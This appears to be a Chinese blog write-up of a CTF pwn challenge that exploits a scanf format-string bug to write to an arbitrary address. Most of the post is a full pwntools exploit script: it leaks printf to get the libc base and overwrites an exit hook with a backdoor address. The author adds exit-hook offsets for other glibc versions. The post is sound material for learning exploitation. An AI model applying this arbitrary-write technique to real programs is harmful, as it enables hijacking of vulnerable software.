[XYCTF新生赛]-PWN:fmt解析(scanf格式化字符串漏洞,任意地址写)

已于 2024-05-04 00:18:06 修改
阅读量208 收藏 1
点赞数 2
分类专栏: PWN 文章标签: 运维 linux 前端 网络安全 安全 系统安全
于 2024-05-03 22:09:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79326813/article/details/138425507
版权

查看保护

查看ida

这里没什么好说的

完整exp:

from pwn import*
context(log_level='debug')
#p=process('./fmt')
p=remote('gz.imxbt.cn',20975)
backdoor=0x4012BE

p.recvuntil(b'gift: ')
printf_addr=int(p.recv(14),16)
print(hex(printf_addr))
libc=ELF('./libc-2.31.so')
libcbase=printf_addr-libc.sym['printf']
exithook=libcbase+0x222f68
payload=b'%7$s'
payload=payload.ljust(8,b'\x00')
payload+=p64(exithook)
p.sendline(payload)
payload=p64(backdoor)
p.sendline(payload)
p.interactive()

这里操作的scanf格式化字符串任意写的实现条件:

1.可控制的格式化字符串的输入(因为要输入格式化字符串以及要修改的地址)

2.scanf

#补充点1:

在libc2.23中可以修改libcbase+0x5f0040+3848或libcbase+0x5f0040+3856为shell

在libc2.27可以修改libcbase+0x619060+3840或libcbase+0x619060+3848

clxhzg
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF中简单杂项小结
Amire0x的小乐园
03-09 7445
MISC1 参考 CTF Wiki MISC 简介 主要分为几个板块:Recon,Forensic,Stego,Crypto(古典密码)… Recon:信息收集 主要介绍一些获取信息的渠道和一些利用百度、谷歌等搜索引擎的技巧 Encode(编码转换) 主要介绍在 CTF中一些常见的编码形式以及转换的技巧和常见方式 Forensic && Stego(数字取证 && 隐分析) 隐取证是 Misc 中最为重要的一块,包括文件分析、隐
Pwn 学习 fmt_str_level_1_x86 格式化字符串
MrTreebook的博客
09-07 1131
【代码】Pwn 学习 fmt_str_level_1_x86 格式化字符串
Pwn·fmt学习笔记
最新发布
qq_22607673的博客
05-26 804
pwn的blind fmt
[BUUCTF]PWN——xman_2019_format(堆上的fmt+爆破栈)
mcmuyanga的博客
03-22 602
xman_2019_format 例行检查,32位程序,开启了nx 检索程序里的字符串,发现了后门函数,back_doorr=0x80485AB 这题buf并不存储在栈上,而是在malloc申请的堆上 之后buf作为参数,进入到sub_80485C4 由于存在后门函数,可以利用格式化字符串将返回地址改为back_door 这边主要利用了%ac$bn,将长度a的数据入偏移为b的位置。 格式化字符串漏洞,一般需要先泄露栈地址,然后计算偏移,但是这里没办法这么利用,因为这里的s存放在chunk上,不在
初步学习CTF格式化字符串漏洞(待更新)
哔...的博客
03-25 946
初步学习CTF格式化字符串漏洞(待更新) 文章目录初步学习CTF格式化字符串漏洞(待更新)格式化字符串漏洞原理利用格式化字符串进行任意地址读利用格式化字符串进行任意地址 https://veritas501.space/2017/04/28/格式化字符串漏洞学习/ 先 List item 看看例子 int main() { char s[60]; char v6 FILE* s...
CTF-PWN-printf(实验吧|格式化字符漏洞)
SuperGate的博客
02-01 3242
首先运行文件,发现需要输入name,于是打开ida逆向出正确的name,来到了程序主界面。 首先我们先逐一判断函数的用途。put_file是让我们输入文本名称和内容,get_file是让我们输入文本名称,然后程序输出文本内容。show_dir是按照先来后出输出所有的文本名称,并且无缝衔接。 这个时候我们发现get_file函数中显然有一个格式化字符漏洞。 这种漏洞会导致我们可以控制任意内存的...
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
Apache Struts CVE-2017-5638的漏洞利用 用法 测试单个URL。 python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --list 'urls.txt' ...
Server-Auto-Pwn:自动Web服务器漏洞扫描程序和漏洞利用程序
05-09
服务器自动拥有SAP为漏洞利用程序提供了一个平台,可以轻松创建该漏洞利用程序,并将其与从shellcode到jsp的各种不同有效负载一起使用,几乎可以与任何漏洞利用程序一起使用。 此外,通过多阶段的shell处理程序,它...
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
Wi-PWN:具有材料设计WebUI的ESP8266解除验证:antenna_bars:
01-28
无线网络ESP8266的Deauther具有简洁的Web界面 :sparkles: 支持在上进行或一次通过| | | 快速响应的Material Design UI,带有可选的暗模式集成的(完全定制) WiFi客户端模式-在WiFi网络上访问Wi-PWN 信息页面,其中...
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
多年以来,每当我决定开始学习pwn时,我发现我无法编漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 我什至开发了一些脚本和工具来...
Pwn 学习 fmt_test_2格式化字符串
MrTreebook的博客
08-21 281
Pwn 学习 fmt_test_2格式化字符串
格式化字符串漏洞原理及其利用(附带pwn例题讲解)
WdIg-2023的博客
04-09 2629
格式化字符串漏洞在实际利用过程中现在几乎挖掘不到了,但是在CTFpwn题中,由于其可以结合其他溢出漏洞利用,还是经常会遇到格式化字符串漏洞的。在我们初识C语言的时候,我们经常会使用到printf这之类的函数,printf函数的第一个参数就是一个格式化字符串,就是程序员可以使用占位符,指定格式,这些占位符用来替代后面的变量或者是数据。简单总结就是说,我们可以在一个字符串中,执行某个位置应该输出怎么样的数据,使用占位符代替,在输出的时候函数会自动按照我们指定的格式,寻找参数并以我们预想的形式输出。
[转载] 格式化字符串漏洞原理介绍
weixin_33963594的博客
12-20 237
  首先,对格式化字符串漏洞的原理进行简单介绍。 格式化字符串函数介绍   格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计算机内存中表示的数据转化为我们人类可读的字符串格式。几乎所有的 C/C++ 程序都会利用格式化字符串函数来输出信息,调试程序,或者处理字符串。一般来说,格式化字符串在利用的时候主要分为三个...
64位格式化字符串漏洞pwn入门
z2876563的博客
08-10 1763
CTF权威指南PWN篇第166页参考程序 如下程序有格式化字符串漏洞,原文是编译成32位程序,为了增加难度,我编译成64位程序。以下我通过漏洞实现输入arg4的地址获取arg4的内容即ABCD。 //fmtdemo.c -o #include<stdio.h> void main() { char format[128]; int arg1 =1,arg2=0x88888882,arg3=-1; char arg4[10]="ABCD"; scanf("%s
2019.11.3 unctf babyfmt格式化字符串任意地址的读和
DSR446的博客
11-03 1685
i春秋的一篇关于格式化字符串文章把任意地址的读和讲的很清晰: https://bbs.ichunqiu.com/thread-43624-1-1.html 方法一:先输入一个 %p 泄露出数组的首地址,再retn处下个断点,用返回地址减去数组的首地址,计算出他们之间的相对偏移。因为栈的地址每次都是变化的,所以我们每次都要泄露栈的地址,然后计算出返回地址。 重要的步骤就是利用fmtstr_pa...
[BUUCTF]PWN——axb_2019_fmt32
mcmuyanga的博客
11-19 1518
axb_2019_fmt32 附件 步骤: 例行检查,32位程序,开启了nx保护 本地试运行一下程序,看看大概的情况 32位ida载入 alarm(),是闹钟函数,主要功能是设置信号传送闹钟,即用来设置信号SIGALRM在经过参数seconds秒数后发送给目前的进程。如果未设置信号SIGALARM的处理函数,那么alarm()默认处理终止进程 25行,明显的格式化字符串漏洞 这题没有后门函数,也没有系统函数,要用格式化字符串泄露出某个libc函数,来获得libc基址 s 和 format 两个参数
ctf 逆向 回顾与总结
weixin_42100211的博客
09-19 5794
记录了我的逆向入门过程。
buuctf gyctf_2020_borrowstack(栈迁移)和r2t4,axb_2019_fmt32(格式化字符串fmtstr_payload工具的使用)
carol2358的博客
05-24 1327
头痛,之前栈学的漏洞好多,只学了相关知识没有做题,真正碰到题目就不会了,真的头痛 gyctf_2020_borrowstack 栈迁移 payload设置 此种攻击方法的关键在于如何同时控制ebp和eip,那么如何同时控制ebp和eip的值的? 1、使用ROPgadget查找leave;ret指令所在的地址 2、覆盖完成bufer后,使用可控制的地址覆盖ebp的值,使用上述leave;ret指令所在地址覆盖ret的值。 程序运行(32位,64位同理): 1、当函数正常返回时,执行leave;re
pwn 格式化字符串scanf
10-09
Pwn中,格式化字符串漏洞通常是指由于不正确地使用格式化字符串函数(如`printf`、`scanf`等),导致攻击者可以读取或修改内存中的数据。而针对`scanf`函数的格式化字符串漏洞,攻击者可以通过输入特定格式的字符串...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值